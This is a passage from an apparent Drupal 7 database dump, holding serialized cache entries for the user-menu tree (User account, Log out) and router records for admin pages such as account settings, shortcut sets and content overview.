:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"user/logout\";s:5:\"title\";s:7:\"Log out\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423782306,1),('links:user-menu:tree-data:en:9ec01ec58bf82a695e4acd636af283e0585fe8cd8a6e54eb140188a3e284ab1c','a:2:{s:4:\"tree\";a:2:{i:2;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:1:\"2\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"user\";s:11:\"router_path\";s:4:\"user\";s:10:\"link_title\";s:12:\"User account\";s:7:\"options\";s:22:\"a:1:{s:5:\"alter\";b:1;}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:15:\"user_menu_title\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:15;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"15\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"user/logout\";s:11:\"router_path\";s:11:\"user/logout\";s:10:\"link_title\";s:7:\"Log out\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"15\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_logged_in\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"user_logout\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"user/logout\";s:5:\"title\";s:7:\"Log out\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423658761,1),('links:user-menu:tree-data:en:bcf621265748b33736f3e83b1c8818308ca1fd410197843c3d264c6ac13b91ad','a:2:{s:4:\"tree\";a:2:{i:2;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:1:\"2\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"user\";s:11:\"router_path\";s:4:\"user\";s:10:\"link_title\";s:12:\"User account\";s:7:\"options\";s:22:\"a:1:{s:5:\"alter\";b:1;}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:15:\"user_menu_title\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:15;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"15\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"user/logout\";s:11:\"router_path\";s:11:\"user/logout\";s:10:\"link_title\";s:7:\"Log out\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"15\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_logged_in\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"user_logout\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"user/logout\";s:5:\"title\";s:7:\"Log out\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423782247,1),('links:user-menu:tree-data:en:cac14999cdc7d5f7f0196586b48c5f900ac44bd30d369d40c831ed506555dcc1','a:2:{s:4:\"tree\";a:2:{i:2;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:1:\"2\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:4:\"user\";s:11:\"router_path\";s:4:\"user\";s:10:\"link_title\";s:12:\"User account\";s:7:\"options\";s:22:\"a:1:{s:5:\"alter\";b:1;}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"2\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:15:\"user_menu_title\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:15;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"user-menu\";s:4:\"mlid\";s:2:\"15\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:11:\"user/logout\";s:11:\"router_path\";s:11:\"user/logout\";s:10:\"link_title\";s:7:\"Log out\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:2:\"15\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_logged_in\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:11:\"user_logout\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:11:\"user/logout\";s:5:\"title\";s:7:\"Log out\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423782393,1),('local_tasks:admin/config','a:1:{i:0;a:23:{s:4:\"path\";s:12:\"admin/config\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:31:\"modules/system/system.admin.inc\";}}',0,1423658962,1),('local_tasks:admin/config/people/accounts','a:6:{i:0;a:23:{s:4:\"path\";s:28:\"admin/config/people/accounts\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:37:\"a:1:{i:0;s:19:\"user_admin_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:16:\"Account settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:109:\"Configure default behavior of users, including registration requirements, e-mails, fields, and user pictures.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}i:1;a:23:{s:4:\"path\";s:44:\"admin/config/people/accounts/display/default\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:31:\"_field_ui_view_mode_menu_access\";s:16:\"access_arguments\";s:105:\"a:5:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:7:\"default\";i:3;s:11:\"user_access\";i:4;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:96:\"a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:7:\"default\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"63\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:36:\"admin/config/people/accounts/display\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:7:\"Default\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:35:\"modules/field_ui/field_ui.admin.inc\";}i:2;a:23:{s:4:\"path\";s:37:\"admin/config/people/accounts/settings\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:37:\"a:1:{i:0;s:19:\"user_admin_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"31\";s:12:\"number_parts\";s:1:\"5\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:28:\"admin/config/people/accounts\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:8:\"Settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/user/user.admin.inc\";}i:3;a:23:{s:4:\"path\";s:41:\"admin/config/people/accounts/display/full\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:31:\"_field_ui_view_mode_menu_access\";s:16:\"access_arguments\";s:102:\"a:5:{i:0;s:4:\"user\";i:1;s:4:\"user\";i:2;s:4:\"full\";i:3;s:11:\"user_access\";i:4;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:93:\"a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:4:\"full\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"63\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:36:\"admin/config/people/accounts/display\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/field_ui/field_ui.admin.inc\";}i:4;a:23:{s:4:\"path\";s:35:\"admin/config/people/accounts/fields\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:76:\"a:3:{i:0;s:28:\"field_ui_field_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"31\";s:12:\"number_parts\";s:1:\"5\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:28:\"admin/config/people/accounts\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:13:\"Manage fields\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"1\";s:12:\"include_file\";s:35:\"modules/field_ui/field_ui.admin.inc\";}i:5;a:23:{s:4:\"path\";s:36:\"admin/config/people/accounts/display\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:96:\"a:4:{i:0;s:30:\"field_ui_display_overview_form\";i:1;s:4:\"user\";i:2;s:4:\"user\";i:3;s:7:\"default\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"31\";s:12:\"number_parts\";s:1:\"5\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:28:\"admin/config/people/accounts\";s:8:\"tab_root\";s:28:\"admin/config/people/accounts\";s:5:\"title\";s:14:\"Manage display\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:35:\"modules/field_ui/field_ui.admin.inc\";}}',0,1423658967,1),('local_tasks:admin/config/user-interface/shortcut/%','a:4:{i:0;a:23:{s:4:\"path\";s:47:\"admin/config/user-interface/shortcut/%/add-link\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:43:\"a:2:{i:0;s:17:\"shortcut_link_add\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"61\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:38:\"admin/config/user-interface/shortcut/%\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:12:\"Add shortcut\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/shortcut/shortcut.admin.inc\";}i:1;a:23:{s:4:\"path\";s:38:\"admin/config/user-interface/shortcut/%\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"30\";s:12:\"number_parts\";s:1:\"5\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:14:\"Edit shortcuts\";s:14:\"title_callback\";s:27:\"shortcut_set_title_callback\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/shortcut/shortcut.admin.inc\";}i:2;a:23:{s:4:\"path\";s:44:\"admin/config/user-interface/shortcut/%/links\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"61\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:38:\"admin/config/user-interface/shortcut/%\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:10:\"List links\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/shortcut/shortcut.admin.inc\";}i:3;a:23:{s:4:\"path\";s:43:\"admin/config/user-interface/shortcut/%/edit\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:2:{i:0;s:22:\"shortcut_set_edit_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"61\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:38:\"admin/config/user-interface/shortcut/%\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:13:\"Edit set name\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"10\";s:12:\"include_file\";s:35:\"modules/shortcut/shortcut.admin.inc\";}}',0,1423659127,1),('local_tasks:admin/content','a:5:{i:0;a:23:{s:4:\"path\";s:13:\"admin/content\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/node/node.admin.inc\";}i:1;a:23:{s:4:\"path\";s:18:\"admin/content/node\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"7\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:13:\"admin/content\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/node/node.admin.inc\";}i:2;a:23:{s:4:\"path\";s:25:\"admin/content/comment/new\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer comments\";}\";s:13:\"page_callback\";s:13:\"comment_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/content/comment\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:18:\"Published comments\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:33:\"modules/comment/comment.admin.inc\";}i:3;a:23:{s:4:\"path\";s:21:\"admin/content/comment\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"administer 